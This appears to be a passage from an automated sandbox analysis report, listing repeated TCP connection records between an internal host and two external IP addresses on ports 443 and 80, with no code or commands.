                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
